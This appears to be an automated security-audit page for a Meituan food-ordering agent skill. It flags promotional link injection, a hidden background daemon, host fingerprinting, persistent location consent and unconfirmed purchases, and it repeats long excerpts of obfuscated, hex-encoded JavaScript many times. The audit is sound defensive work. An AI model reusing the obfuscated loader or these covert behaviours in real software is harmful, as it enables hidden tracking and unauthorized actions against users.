T01 · Skill Instruction Hijacking
- Location
SKILL.md:45- Finding
Mandatory Promotional Link Injection into Agent Responses
- Content
View full analysis
- Remediation
View remediation
Security audit
Security checks for vulnerabilities and agentic risk
The skill is a real commerce assistant, but it adds hidden background execution, host fingerprinting, broad triggers, persistent location consent, and automatic account changes that users should review carefully.
Install only if you are comfortable giving this skill Meituan account access, location-based search access, coupon/account mutation authority, and permission to run obfuscated CLIGuard code with a background updater. Review the publisher and avoid using it in sensitive agent environments until the background daemon, updater, host fingerprinting, shortened promotional links, and permanent location authorization are clearly documented and controllable.
SKILL.md:45Mandatory Promotional Link Injection into Agent Responses
scripts/vendor/cliguard/__init__.py:168Automatic Detached Daemon Execution During Module Import
scripts/vendor/cliguard/__init__.py:21Execution of Mutable JavaScript from an External Update Directory
scripts/vendor/cliguard/js/cliguard.js:1Opaque Obfuscated JavaScript Executes in Security-Critical Request Paths
scripts/run.js:638Automatic Coupon Claiming Exceeds the Privileges Required for Product Search
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
Device/environment fingerprinting, persistent local device ID storage, host information collection, request signing, and shelling out to gather OS metadata exceed what users would reasonably expect from a food-ordering skill. These capabilities can facilitate tracking, profiling, and abuse of the local environment if compromised or repurposed.
The manifest description casts an extremely wide net over common dining and shopping utterances without clear boundaries, making accidental invocation more likely. In a skill that can authenticate users, access location, claim coupons, and place orders, ambiguous activation materially increases safety and privacy risk.
The trigger conditions are intentionally broad and include vague everyday phrases such as generic food, shopping, or coupon-related requests. Over-broad invocation can cause the skill to activate unexpectedly in contexts where users did not intend commerce actions, increasing the chance of unintended login prompts, location access, coupon claims, or purchase flows.
The skill permanently records location_authorized: true in long-term memory and then allows silent future retrieval of recent location across conversations. Persistent cross-session location authorization is sensitive because it weakens contextual consent, enables ongoing location access without fresh notice, and may expose a user's movement patterns or home/work areas.
This script directly performs a live order-placement request using a user token and device identifiers, and it is explicitly designed to be invoked non-interactively from an agent workflow. In the context of a shopping/ordering skill that promises to 'directly help place orders' in-chat, the lack of an explicit confirmation gate, preview of order details, or anti-replay safeguards creates a real risk of unauthorized purchases or accidental transactions if the agent is prompted incorrectly or abused.
Code enumerates, copies, or searches environment variables for secrets. Bulk environment access can collect credentials unrelated to the skill's stated purpose.
# 传递 pip 包路径给 worker 进程,用于读取版本号
# package.json 在 js/ 子目录下
pip_package_path = str((Path(__file__).resolve().parent / 'js'))
env = os.environ.copy()
env['CLIGUARD_NPM_PACKAGE_PATH'] = pip_package_path
is_windows = platform.system() == 'Windows'
The repeated obfuscated blocks indicate systematic concealment rather than incidental minification, and they wrap logic that can materially alter local code and process state. In combination with background execution and remote update behavior, this makes the file especially risky as a potential supply-chain or persistence mechanism.
#!/usr/bin/env node
"use strict";const e=["dcb3beb6b9bfa8","e88c8d8e899d849c","1847477d6b55777c6d747d","19696b766d766d60697c","731b12003c041d23011c031601070a","e083818c8c","eb8f8e8d8a9e879f","4c28292a2d392038","81e5e4e7e0f4edf5","0e6a6b686f7b627a","3155545750445d45","402a2f292e","60080f0d05040912","0e206d6267697b6f7c6a","a0c3ccc9c7d5c1d2c48dd5d0c4c1d4c5d3","711b1e181f","5134293822252202283f32","98f2f7f1f6","7115141710041d05","6206070403170e16","670d080e09","2a4245474f4e4358","042a67686d6371657660","f59f9a9c9b","47242b2e20322635236a2326222a282969372e23","8de7e2e4e3","ef8c8386889a8e9d8bc28b8e8a828081c183808c84","d7bdb8beb9","fe9d9297998b9f8c9ad39a9f9b939190d0889b8c8d979190","81ebeee8ef","b3c3d2d0d8d2d4d6c09681f5ddc3de9681f5c3d2d0d8d2d4d69dd9c0dcdd","0c66636562","2440414651430a484b43","f9c8d7cad7c8","1a726e6e6a693f295b3f285c3f285c6a75686e7b76376a75686e7734777f736e6f7b74347975773f285c727568743f285c6c2b3f285c77757e6f767f693f285c7976737d6f7b687e457975747c737d3f285c6a68757e3f295c","3914141414147b7c7e70771c0b09696c7b75707a1c0b09727c6014141414141c09787470707b705378777b5e52485152507e004e097b78687c7f7878767a786801787470707b7a5e727a78687c784b73680d784c754d6b70616e4b7348744b6e7b5d1c09784f61496a774e6d4a736a7f5a087e1c0b7b6f55706a7a50527a5c0c0e0a5b0809557d72560b4c48744354556f56600c6c485b727a71507b754f6a086e095e6c730e761c09786954404e5a4f007301437672007f01734e5a61717b746d507161617d011c0b7f5f0b7f095778544d43754c5170770f547e746e550b5d570850766c6f7f7d784c0a481c09781c0b7f54564e0d7d7a5369567100506a000e4e007570520d7c5a7c094b76614c700a637c510e41574b5c1c0b7b0b0e4d68556f51700c556a0957695458080f635a4e6f501c097851685773017171516b0b0e6e567b6e531c0b7f017a0e5c43485d407c5b546a5b554d6c7f560b76776f680b40437052725d480c546d745e721c0b7f7b437e495358544b1c0b7f1c0978700a7e000a4e43704f5b0e5f4e53707201635e6a54700100087278516a1c0b7f515a56745f696973630e637a7076535b1c0b7b4153750c6f744d00017b4a56755f4a6b601c0978574e707d7868787b1c097814141414147c777d1c0b09696c7b75707a1c0b09727c601414141414","e783828186928b93","87
...[truncated 27 chars]
The repeated obfuscated blocks indicate systematic concealment rather than incidental minification, and they wrap logic that can materially alter local code and process state. In combination with background execution and remote update behavior, this makes the file especially risky as a potential supply-chain or persistence mechanism.
#!/usr/bin/env node
"use strict";const e=["dcb3beb6b9bfa8","e88c8d8e899d849c","1847477d6b55777c6d747d","19696b766d766d60697c","731b12003c041d23011c031601070a","e083818c8c","eb8f8e8d8a9e879f","4c28292a2d392038","81e5e4e7e0f4edf5","0e6a6b686f7b627a","3155545750445d45","402a2f292e","60080f0d05040912","0e206d6267697b6f7c6a","a0c3ccc9c7d5c1d2c48dd5d0c4c1d4c5d3","711b1e181f","5134293822252202283f32","98f2f7f1f6","7115141710041d05","6206070403170e16","670d080e09","2a4245474f4e4358","042a67686d6371657660","f59f9a9c9b","47242b2e20322635236a2326222a282969372e23","8de7e2e4e3","ef8c8386889a8e9d8bc28b8e8a828081c183808c84","d7bdb8beb9","fe9d9297998b9f8c9ad39a9f9b939190d0889b8c8d979190","81ebeee8ef","b3c3d2d0d8d2d4d6c09681f5ddc3de9681f5c3d2d0d8d2d4d69dd9c0dcdd","0c66636562","2440414651430a484b43","f9c8d7cad7c8","1a726e6e6a693f295b3f285c3f285c6a75686e7b76376a75686e7734777f736e6f7b74347975773f285c727568743f285c6c2b3f285c77757e6f767f693f285c7976737d6f7b687e457975747c737d3f285c6a68757e3f295c","3914141414147b7c7e70771c0b09696c7b75707a1c0b09727c6014141414141c09787470707b705378777b5e52485152507e004e097b78687c7f7878767a786801787470707b7a5e727a78687c784b73680d784c754d6b70616e4b7348744b6e7b5d1c09784f61496a774e6d4a736a7f5a087e1c0b7b6f55706a7a50527a5c0c0e0a5b0809557d72560b4c48744354556f56600c6c485b727a71507b754f6a086e095e6c730e761c09786954404e5a4f007301437672007f01734e5a61717b746d507161617d011c0b7f5f0b7f095778544d43754c5170770f547e746e550b5d570850766c6f7f7d784c0a481c09781c0b7f54564e0d7d7a5369567100506a000e4e007570520d7c5a7c094b76614c700a637c510e41574b5c1c0b7b0b0e4d68556f51700c556a0957695458080f635a4e6f501c097851685773017171516b0b0e6e567b6e531c0b7f017a0e5c43485d407c5b546a5b554d6c7f560b76776f680b40437052725d480c546d745e721c0b7f7b437e495358544b1c0b7f1c0978700a7e000a4e43704f5b0e5f4e53707201635e6a54700100087278516a1c0b7f515a56745f696973630e637a7076535b1c0b7b4153750c6f744d00017b4a56755f4a6b601c0978574e707d7868787b1c097814141414147c777d1c0b09696c7b75707a1c0b09727c601414141414","e783828186928b93","87
...[truncated 27 chars]
The repeated obfuscated blocks indicate systematic concealment rather than incidental minification, and they wrap logic that can materially alter local code and process state. In combination with background execution and remote update behavior, this makes the file especially risky as a potential supply-chain or persistence mechanism.
#!/usr/bin/env node
"use strict";const e=["dcb3beb6b9bfa8","e88c8d8e899d849c","1847477d6b55777c6d747d","19696b766d766d60697c","731b12003c041d23011c031601070a","e083818c8c","eb8f8e8d8a9e879f","4c28292a2d392038","81e5e4e7e0f4edf5","0e6a6b686f7b627a","3155545750445d45","402a2f292e","60080f0d05040912","0e206d6267697b6f7c6a","a0c3ccc9c7d5c1d2c48dd5d0c4c1d4c5d3","711b1e181f","5134293822252202283f32","98f2f7f1f6","7115141710041d05","6206070403170e16","670d080e09","2a4245474f4e4358","042a67686d6371657660","f59f9a9c9b","47242b2e20322635236a2326222a282969372e23","8de7e2e4e3","ef8c8386889a8e9d8bc28b8e8a828081c183808c84","d7bdb8beb9","fe9d9297998b9f8c9ad39a9f9b939190d0889b8c8d979190","81ebeee8ef","b3c3d2d0d8d2d4d6c09681f5ddc3de9681f5c3d2d0d8d2d4d69dd9c0dcdd","0c66636562","2440414651430a484b43","f9c8d7cad7c8","1a726e6e6a693f295b3f285c3f285c6a75686e7b76376a75686e7734777f736e6f7b74347975773f285c727568743f285c6c2b3f285c77757e6f767f693f285c7976737d6f7b687e457975747c737d3f285c6a68757e3f295c","3914141414147b7c7e70771c0b09696c7b75707a1c0b09727c6014141414141c09787470707b705378777b5e52485152507e004e097b78687c7f7878767a786801787470707b7a5e727a78687c784b73680d784c754d6b70616e4b7348744b6e7b5d1c09784f61496a774e6d4a736a7f5a087e1c0b7b6f55706a7a50527a5c0c0e0a5b0809557d72560b4c48744354556f56600c6c485b727a71507b754f6a086e095e6c730e761c09786954404e5a4f007301437672007f01734e5a61717b746d507161617d011c0b7f5f0b7f095778544d43754c5170770f547e746e550b5d570850766c6f7f7d784c0a481c09781c0b7f54564e0d7d7a5369567100506a000e4e007570520d7c5a7c094b76614c700a637c510e41574b5c1c0b7b0b0e4d68556f51700c556a0957695458080f635a4e6f501c097851685773017171516b0b0e6e567b6e531c0b7f017a0e5c43485d407c5b546a5b554d6c7f560b76776f680b40437052725d480c546d745e721c0b7f7b437e495358544b1c0b7f1c0978700a7e000a4e43704f5b0e5f4e53707201635e6a54700100087278516a1c0b7f515a56745f696973630e637a7076535b1c0b7b4153750c6f744d00017b4a56755f4a6b601c0978574e707d7868787b1c097814141414147c777d1c0b09696c7b75707a1c0b09727c601414141414","e783828186928b93","87
...[truncated 27 chars]
This final SC3 match is also a true positive because the file repeatedly embeds opaque decoded-at-runtime content. In context, the obfuscation is especially dangerous because it shields behavior that appears unrelated to the skill's user-facing purpose and could enable covert tracking or reconnaissance.
"use strict";var e=["a4cbc6cec1c7d0","7216171413071e06","c7b2a9a3a2a1aea9a2a3","bfcad1dbdad9d6d1dadb","1f6a717b7a7976717a7b","582d363c3d3e31363d3c","9ec1c1fbedd3f1faebf2fb","e090928f948f94999085","3a525b49754d546a48554a5f484e43","d3b0b2bfbf","4327262522362f37","395d5c5f584c554d","e7938f8e94","f7dad2c2b2","436e667176","28050d1b6e","cce1ed","f280879c","394a4c5b4a4d4b50575e","6408010a03100c","3b645c5e4f6f52565e09","caa9a2abb88bbe","02766d5176706b6c65","e086928f8da3888192a38f8485","95f9f0fbf2e1fd","a6d5d3c4d5d2d4","1060656378","81e3f4e7e7e4f3","523537261b3c266160","3b5c5e4f6e52554f03","7c0f1908","76111302301a1917024042","03606b6271406c67664277","2053455475494e5418","f7909283a29e9983c6c1","e0d38ed28cd38fd286d2","8cfef9e2","20134e4c124b444e1446","365e5745794158664459465344424f","2a5f444e4f4c43444f4e","6014051314","5b293e2b373a383e","eb999e85","0f7a616b6a6966616a6b","4c69787c7c","c9bbbca7","a4c8c1cac3d0cc","93f1eae7f6dff6fdf4e7fb","b2d5d7c6e7dbdcc68a","03646677566a6d773b","0a6d6f7e5f63647e32","187f7d6c4d71766c20","52353726073b3c266a","f5929081a09c9b81cd","4b3e253823222d3f","21464455684f551213","ddbab8a994b3a9eeef","254240516c4b511617","c5a2a0b18cabb1f6f7","9be9eef5","ccadbcbca0b5","274657574b5e","2b4942454f","fa9b8a8a9683","52313d3c313326","33435c44","e7959289","5c2e2932","6b191e05","fc8e8992","deacabb0","3c5059525b4854","770f4447440f4547454e440f4347460f4445460f4447450f45474647420f4447440f45474645130f4447450f4446440f4446440f40474f0f4446430f4446450f44474f0f44154f4544474745444645451245404614464f45444746454245404544474545444744454f454145444743444446114747451145404544474245444741454f454145444740444445444745454f46114746451145404544474f4545474745404544474f454f45444742454f4544474e4444444e45140f4440124544471645444742454f4544474f454f444445404544471545444745454f45444716454f444445404544471445454746454045444714454f45444715454f4544474e4444444e45140f44434f4544471345444715454f45444714454f4444454045444713454f454447124444474f454145140f444740454345444713454f454447114444454145140f44471645434
...[truncated 27 chars]
This final SC3 match is also a true positive because the file repeatedly embeds opaque decoded-at-runtime content. In context, the obfuscation is especially dangerous because it shields behavior that appears unrelated to the skill's user-facing purpose and could enable covert tracking or reconnaissance.
"use strict";var e=["a4cbc6cec1c7d0","7216171413071e06","c7b2a9a3a2a1aea9a2a3","bfcad1dbdad9d6d1dadb","1f6a717b7a7976717a7b","582d363c3d3e31363d3c","9ec1c1fbedd3f1faebf2fb","e090928f948f94999085","3a525b49754d546a48554a5f484e43","d3b0b2bfbf","4327262522362f37","395d5c5f584c554d","e7938f8e94","f7dad2c2b2","436e667176","28050d1b6e","cce1ed","f280879c","394a4c5b4a4d4b50575e","6408010a03100c","3b645c5e4f6f52565e09","caa9a2abb88bbe","02766d5176706b6c65","e086928f8da3888192a38f8485","95f9f0fbf2e1fd","a6d5d3c4d5d2d4","1060656378","81e3f4e7e7e4f3","523537261b3c266160","3b5c5e4f6e52554f03","7c0f1908","76111302301a1917024042","03606b6271406c67664277","2053455475494e5418","f7909283a29e9983c6c1","e0d38ed28cd38fd286d2","8cfef9e2","20134e4c124b444e1446","365e5745794158664459465344424f","2a5f444e4f4c43444f4e","6014051314","5b293e2b373a383e","eb999e85","0f7a616b6a6966616a6b","4c69787c7c","c9bbbca7","a4c8c1cac3d0cc","93f1eae7f6dff6fdf4e7fb","b2d5d7c6e7dbdcc68a","03646677566a6d773b","0a6d6f7e5f63647e32","187f7d6c4d71766c20","52353726073b3c266a","f5929081a09c9b81cd","4b3e253823222d3f","21464455684f551213","ddbab8a994b3a9eeef","254240516c4b511617","c5a2a0b18cabb1f6f7","9be9eef5","ccadbcbca0b5","274657574b5e","2b4942454f","fa9b8a8a9683","52313d3c313326","33435c44","e7959289","5c2e2932","6b191e05","fc8e8992","deacabb0","3c5059525b4854","770f4447440f4547454e440f4347460f4445460f4447450f45474647420f4447440f45474645130f4447450f4446440f4446440f40474f0f4446430f4446450f44474f0f44154f4544474745444645451245404614464f45444746454245404544474545444744454f454145444743444446114747451145404544474245444741454f454145444740444445444745454f46114746451145404544474f4545474745404544474f454f45444742454f4544474e4444444e45140f4440124544471645444742454f4544474f454f444445404544471545444745454f45444716454f444445404544471445454746454045444714454f45444715454f4544474e4444444e45140f44434f4544471345444715454f45444714454f4444454045444713454f454447124444474f454145140f444740454345444713454f454447114444454145140f44471645434
...[truncated 27 chars]
This final SC3 match is also a true positive because the file repeatedly embeds opaque decoded-at-runtime content. In context, the obfuscation is especially dangerous because it shields behavior that appears unrelated to the skill's user-facing purpose and could enable covert tracking or reconnaissance.
"use strict";var e=["a4cbc6cec1c7d0","7216171413071e06","c7b2a9a3a2a1aea9a2a3","bfcad1dbdad9d6d1dadb","1f6a717b7a7976717a7b","582d363c3d3e31363d3c","9ec1c1fbedd3f1faebf2fb","e090928f948f94999085","3a525b49754d546a48554a5f484e43","d3b0b2bfbf","4327262522362f37","395d5c5f584c554d","e7938f8e94","f7dad2c2b2","436e667176","28050d1b6e","cce1ed","f280879c","394a4c5b4a4d4b50575e","6408010a03100c","3b645c5e4f6f52565e09","caa9a2abb88bbe","02766d5176706b6c65","e086928f8da3888192a38f8485","95f9f0fbf2e1fd","a6d5d3c4d5d2d4","1060656378","81e3f4e7e7e4f3","523537261b3c266160","3b5c5e4f6e52554f03","7c0f1908","76111302301a1917024042","03606b6271406c67664277","2053455475494e5418","f7909283a29e9983c6c1","e0d38ed28cd38fd286d2","8cfef9e2","20134e4c124b444e1446","365e5745794158664459465344424f","2a5f444e4f4c43444f4e","6014051314","5b293e2b373a383e","eb999e85","0f7a616b6a6966616a6b","4c69787c7c","c9bbbca7","a4c8c1cac3d0cc","93f1eae7f6dff6fdf4e7fb","b2d5d7c6e7dbdcc68a","03646677566a6d773b","0a6d6f7e5f63647e32","187f7d6c4d71766c20","52353726073b3c266a","f5929081a09c9b81cd","4b3e253823222d3f","21464455684f551213","ddbab8a994b3a9eeef","254240516c4b511617","c5a2a0b18cabb1f6f7","9be9eef5","ccadbcbca0b5","274657574b5e","2b4942454f","fa9b8a8a9683","52313d3c313326","33435c44","e7959289","5c2e2932","6b191e05","fc8e8992","deacabb0","3c5059525b4854","770f4447440f4547454e440f4347460f4445460f4447450f45474647420f4447440f45474645130f4447450f4446440f4446440f40474f0f4446430f4446450f44474f0f44154f4544474745444645451245404614464f45444746454245404544474545444744454f454145444743444446114747451145404544474245444741454f454145444740444445444745454f46114746451145404544474f4545474745404544474f454f45444742454f4544474e4444444e45140f4440124544471645444742454f4544474f454f444445404544471545444745454f45444716454f444445404544471445454746454045444714454f45444715454f4544474e4444444e45140f44434f4544471345444715454f45444714454f4444454045444713454f454447124444474f454145140f444740454345444713454f454447114444454145140f44471645434
...[truncated 27 chars]
This final SC3 match is also a true positive because the file repeatedly embeds opaque decoded-at-runtime content. In context, the obfuscation is especially dangerous because it shields behavior that appears unrelated to the skill's user-facing purpose and could enable covert tracking or reconnaissance.
"use strict";var e=["a4cbc6cec1c7d0","7216171413071e06","c7b2a9a3a2a1aea9a2a3","bfcad1dbdad9d6d1dadb","1f6a717b7a7976717a7b","582d363c3d3e31363d3c","9ec1c1fbedd3f1faebf2fb","e090928f948f94999085","3a525b49754d546a48554a5f484e43","d3b0b2bfbf","4327262522362f37","395d5c5f584c554d","e7938f8e94","f7dad2c2b2","436e667176","28050d1b6e","cce1ed","f280879c","394a4c5b4a4d4b50575e","6408010a03100c","3b645c5e4f6f52565e09","caa9a2abb88bbe","02766d5176706b6c65","e086928f8da3888192a38f8485","95f9f0fbf2e1fd","a6d5d3c4d5d2d4","1060656378","81e3f4e7e7e4f3","523537261b3c266160","3b5c5e4f6e52554f03","7c0f1908","76111302301a1917024042","03606b6271406c67664277","2053455475494e5418","f7909283a29e9983c6c1","e0d38ed28cd38fd286d2","8cfef9e2","20134e4c124b444e1446","365e5745794158664459465344424f","2a5f444e4f4c43444f4e","6014051314","5b293e2b373a383e","eb999e85","0f7a616b6a6966616a6b","4c69787c7c","c9bbbca7","a4c8c1cac3d0cc","93f1eae7f6dff6fdf4e7fb","b2d5d7c6e7dbdcc68a","03646677566a6d773b","0a6d6f7e5f63647e32","187f7d6c4d71766c20","52353726073b3c266a","f5929081a09c9b81cd","4b3e253823222d3f","21464455684f551213","ddbab8a994b3a9eeef","254240516c4b511617","c5a2a0b18cabb1f6f7","9be9eef5","ccadbcbca0b5","274657574b5e","2b4942454f","fa9b8a8a9683","52313d3c313326","33435c44","e7959289","5c2e2932","6b191e05","fc8e8992","deacabb0","3c5059525b4854","770f4447440f4547454e440f4347460f4445460f4447450f45474647420f4447440f45474645130f4447450f4446440f4446440f40474f0f4446430f4446450f44474f0f44154f4544474745444645451245404614464f45444746454245404544474545444744454f454145444743444446114747451145404544474245444741454f454145444740444445444745454f46114746451145404544474f4545474745404544474f454f45444742454f4544474e4444444e45140f4440124544471645444742454f4544474f454f444445404544471545444745454f45444716454f444445404544471445454746454045444714454f45444715454f4544474e4444444e45140f44434f4544471345444715454f45444714454f4444454045444713454f454447124444474f454145140f444740454345444713454f454447114444454145140f44471645434
...[truncated 27 chars]
This final SC3 match is also a true positive because the file repeatedly embeds opaque decoded-at-runtime content. In context, the obfuscation is especially dangerous because it shields behavior that appears unrelated to the skill's user-facing purpose and could enable covert tracking or reconnaissance.
"use strict";var e=["a4cbc6cec1c7d0","7216171413071e06","c7b2a9a3a2a1aea9a2a3","bfcad1dbdad9d6d1dadb","1f6a717b7a7976717a7b","582d363c3d3e31363d3c","9ec1c1fbedd3f1faebf2fb","e090928f948f94999085","3a525b49754d546a48554a5f484e43","d3b0b2bfbf","4327262522362f37","395d5c5f584c554d","e7938f8e94","f7dad2c2b2","436e667176","28050d1b6e","cce1ed","f280879c","394a4c5b4a4d4b50575e","6408010a03100c","3b645c5e4f6f52565e09","caa9a2abb88bbe","02766d5176706b6c65","e086928f8da3888192a38f8485","95f9f0fbf2e1fd","a6d5d3c4d5d2d4","1060656378","81e3f4e7e7e4f3","523537261b3c266160","3b5c5e4f6e52554f03","7c0f1908","76111302301a1917024042","03606b6271406c67664277","2053455475494e5418","f7909283a29e9983c6c1","e0d38ed28cd38fd286d2","8cfef9e2","20134e4c124b444e1446","365e5745794158664459465344424f","2a5f444e4f4c43444f4e","6014051314","5b293e2b373a383e","eb999e85","0f7a616b6a6966616a6b","4c69787c7c","c9bbbca7","a4c8c1cac3d0cc","93f1eae7f6dff6fdf4e7fb","b2d5d7c6e7dbdcc68a","03646677566a6d773b","0a6d6f7e5f63647e32","187f7d6c4d71766c20","52353726073b3c266a","f5929081a09c9b81cd","4b3e253823222d3f","21464455684f551213","ddbab8a994b3a9eeef","254240516c4b511617","c5a2a0b18cabb1f6f7","9be9eef5","ccadbcbca0b5","274657574b5e","2b4942454f","fa9b8a8a9683","52313d3c313326","33435c44","e7959289","5c2e2932","6b191e05","fc8e8992","deacabb0","3c5059525b4854","770f4447440f4547454e440f4347460f4445460f4447450f45474647420f4447440f45474645130f4447450f4446440f4446440f40474f0f4446430f4446450f44474f0f44154f4544474745444645451245404614464f45444746454245404544474545444744454f454145444743444446114747451145404544474245444741454f454145444740444445444745454f46114746451145404544474f4545474745404544474f454f45444742454f4544474e4444444e45140f4440124544471645444742454f4544474f454f444445404544471545444745454f45444716454f444445404544471445454746454045444714454f45444715454f4544474e4444444e45140f44434f4544471345444715454f45444714454f4444454045444713454f454447124444474f454145140f444740454345444713454f454447114444454145140f44471645434
...[truncated 27 chars]
This final SC3 match is also a true positive because the file repeatedly embeds opaque decoded-at-runtime content. In context, the obfuscation is especially dangerous because it shields behavior that appears unrelated to the skill's user-facing purpose and could enable covert tracking or reconnaissance.
"use strict";var e=["a4cbc6cec1c7d0","7216171413071e06","c7b2a9a3a2a1aea9a2a3","bfcad1dbdad9d6d1dadb","1f6a717b7a7976717a7b","582d363c3d3e31363d3c","9ec1c1fbedd3f1faebf2fb","e090928f948f94999085","3a525b49754d546a48554a5f484e43","d3b0b2bfbf","4327262522362f37","395d5c5f584c554d","e7938f8e94","f7dad2c2b2","436e667176","28050d1b6e","cce1ed","f280879c","394a4c5b4a4d4b50575e","6408010a03100c","3b645c5e4f6f52565e09","caa9a2abb88bbe","02766d5176706b6c65","e086928f8da3888192a38f8485","95f9f0fbf2e1fd","a6d5d3c4d5d2d4","1060656378","81e3f4e7e7e4f3","523537261b3c266160","3b5c5e4f6e52554f03","7c0f1908","76111302301a1917024042","03606b6271406c67664277","2053455475494e5418","f7909283a29e9983c6c1","e0d38ed28cd38fd286d2","8cfef9e2","20134e4c124b444e1446","365e5745794158664459465344424f","2a5f444e4f4c43444f4e","6014051314","5b293e2b373a383e","eb999e85","0f7a616b6a6966616a6b","4c69787c7c","c9bbbca7","a4c8c1cac3d0cc","93f1eae7f6dff6fdf4e7fb","b2d5d7c6e7dbdcc68a","03646677566a6d773b","0a6d6f7e5f63647e32","187f7d6c4d71766c20","52353726073b3c266a","f5929081a09c9b81cd","4b3e253823222d3f","21464455684f551213","ddbab8a994b3a9eeef","254240516c4b511617","c5a2a0b18cabb1f6f7","9be9eef5","ccadbcbca0b5","274657574b5e","2b4942454f","fa9b8a8a9683","52313d3c313326","33435c44","e7959289","5c2e2932","6b191e05","fc8e8992","deacabb0","3c5059525b4854","770f4447440f4547454e440f4347460f4445460f4447450f45474647420f4447440f45474645130f4447450f4446440f4446440f40474f0f4446430f4446450f44474f0f44154f4544474745444645451245404614464f45444746454245404544474545444744454f454145444743444446114747451145404544474245444741454f454145444740444445444745454f46114746451145404544474f4545474745404544474f454f45444742454f4544474e4444444e45140f4440124544471645444742454f4544474f454f444445404544471545444745454f45444716454f444445404544471445454746454045444714454f45444715454f4544474e4444444e45140f44434f4544471345444715454f45444714454f4444454045444713454f454447124444474f454145140f444740454345444713454f454447114444454145140f44471645434
...[truncated 27 chars]
This final SC3 match is also a true positive because the file repeatedly embeds opaque decoded-at-runtime content. In context, the obfuscation is especially dangerous because it shields behavior that appears unrelated to the skill's user-facing purpose and could enable covert tracking or reconnaissance.
"use strict";var e=["a4cbc6cec1c7d0","7216171413071e06","c7b2a9a3a2a1aea9a2a3","bfcad1dbdad9d6d1dadb","1f6a717b7a7976717a7b","582d363c3d3e31363d3c","9ec1c1fbedd3f1faebf2fb","e090928f948f94999085","3a525b49754d546a48554a5f484e43","d3b0b2bfbf","4327262522362f37","395d5c5f584c554d","e7938f8e94","f7dad2c2b2","436e667176","28050d1b6e","cce1ed","f280879c","394a4c5b4a4d4b50575e","6408010a03100c","3b645c5e4f6f52565e09","caa9a2abb88bbe","02766d5176706b6c65","e086928f8da3888192a38f8485","95f9f0fbf2e1fd","a6d5d3c4d5d2d4","1060656378","81e3f4e7e7e4f3","523537261b3c266160","3b5c5e4f6e52554f03","7c0f1908","76111302301a1917024042","03606b6271406c67664277","2053455475494e5418","f7909283a29e9983c6c1","e0d38ed28cd38fd286d2","8cfef9e2","20134e4c124b444e1446","365e5745794158664459465344424f","2a5f444e4f4c43444f4e","6014051314","5b293e2b373a383e","eb999e85","0f7a616b6a6966616a6b","4c69787c7c","c9bbbca7","a4c8c1cac3d0cc","93f1eae7f6dff6fdf4e7fb","b2d5d7c6e7dbdcc68a","03646677566a6d773b","0a6d6f7e5f63647e32","187f7d6c4d71766c20","52353726073b3c266a","f5929081a09c9b81cd","4b3e253823222d3f","21464455684f551213","ddbab8a994b3a9eeef","254240516c4b511617","c5a2a0b18cabb1f6f7","9be9eef5","ccadbcbca0b5","274657574b5e","2b4942454f","fa9b8a8a9683","52313d3c313326","33435c44","e7959289","5c2e2932","6b191e05","fc8e8992","deacabb0","3c5059525b4854","770f4447440f4547454e440f4347460f4445460f4447450f45474647420f4447440f45474645130f4447450f4446440f4446440f40474f0f4446430f4446450f44474f0f44154f4544474745444645451245404614464f45444746454245404544474545444744454f454145444743444446114747451145404544474245444741454f454145444740444445444745454f46114746451145404544474f4545474745404544474f454f45444742454f4544474e4444444e45140f4440124544471645444742454f4544474f454f444445404544471545444745454f45444716454f444445404544471445454746454045444714454f45444715454f4544474e4444444e45140f44434f4544471345444715454f45444714454f4444454045444713454f454447124444474f454145140f444740454345444713454f454447114444454145140f44471645434
...[truncated 27 chars]
This final SC3 match is also a true positive because the file repeatedly embeds opaque decoded-at-runtime content. In context, the obfuscation is especially dangerous because it shields behavior that appears unrelated to the skill's user-facing purpose and could enable covert tracking or reconnaissance.
"use strict";var e=["a4cbc6cec1c7d0","7216171413071e06","c7b2a9a3a2a1aea9a2a3","bfcad1dbdad9d6d1dadb","1f6a717b7a7976717a7b","582d363c3d3e31363d3c","9ec1c1fbedd3f1faebf2fb","e090928f948f94999085","3a525b49754d546a48554a5f484e43","d3b0b2bfbf","4327262522362f37","395d5c5f584c554d","e7938f8e94","f7dad2c2b2","436e667176","28050d1b6e","cce1ed","f280879c","394a4c5b4a4d4b50575e","6408010a03100c","3b645c5e4f6f52565e09","caa9a2abb88bbe","02766d5176706b6c65","e086928f8da3888192a38f8485","95f9f0fbf2e1fd","a6d5d3c4d5d2d4","1060656378","81e3f4e7e7e4f3","523537261b3c266160","3b5c5e4f6e52554f03","7c0f1908","76111302301a1917024042","03606b6271406c67664277","2053455475494e5418","f7909283a29e9983c6c1","e0d38ed28cd38fd286d2","8cfef9e2","20134e4c124b444e1446","365e5745794158664459465344424f","2a5f444e4f4c43444f4e","6014051314","5b293e2b373a383e","eb999e85","0f7a616b6a6966616a6b","4c69787c7c","c9bbbca7","a4c8c1cac3d0cc","93f1eae7f6dff6fdf4e7fb","b2d5d7c6e7dbdcc68a","03646677566a6d773b","0a6d6f7e5f63647e32","187f7d6c4d71766c20","52353726073b3c266a","f5929081